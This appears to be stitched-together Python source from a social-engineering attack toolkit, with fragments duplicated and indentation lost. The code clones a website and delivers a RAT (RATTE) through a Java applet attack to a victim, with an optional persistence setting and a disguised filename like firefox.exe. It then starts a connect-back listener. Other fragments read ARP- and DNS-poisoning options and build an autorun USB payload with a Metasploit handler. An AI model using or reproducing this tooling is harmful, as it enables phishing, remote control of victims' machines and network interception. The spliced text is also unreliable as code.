subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
definepath=os.getcwd()
# grab config file
config=file("config/set_config", "r").readlines()
# grab our default directory
cwd=os.getcwd()
# set a variable as default to n or no
ettercapchoice= 'n'
# add dsniffchoice
dsniffchoice = 'n'
for line in config:
# check for ettercap choice here
match1=re.search("ETTERCAP=ON",line)
if match1:
setcore.print_info("ARP Cache Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC)
ettercapchoice='y'
# check for dsniff choice here
match2=re.search("DSNIFF=ON", line)
if match2:
setcore.print_info("DSNIFF DNS Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC)
dsniffchoice = 'y'
ettercapchoice = 'n'
# GRAB CONFIG from SET
fileopen=file("config/set_config", "r").readlines()
for line in fileopen:
# grab the ettercap interface
match=re.search("ETTERCAP_INTERFACE=", line)
if match:
def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter = 0
site_input_counter = 0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(
core.setprompt(["9", "2"],
"Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?" +
core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning(
"I can't determine the fqdn or IP of the site. Try again?"
)
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning(
"I couldn't determine whether this is an http or https site. Try again?"
)
site_input_counter += 1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(
core.setprompt(["9", "2"],
"Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
try:
ratteport = int(
raw_input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
raw_input(
core.setprompt(
["9", "2"],
"Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(
["9", "2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe = raw_input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" %
(definepath, definepath, ratte_random),
shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
# if using pdf payload
elif trigger == 2:
payload = "template.pdf"
elif trigger == 3:
payload = "openthis.wab"
else:
payload = ""
filewrite.write("""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))
core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
if trigger in [1, 2, 3]:
choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.setdir, "payload.options")) as fileopen:
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload {0}\n".format(line[0]))
filewrite.write("set lhost {0}\n".format(line[1]))
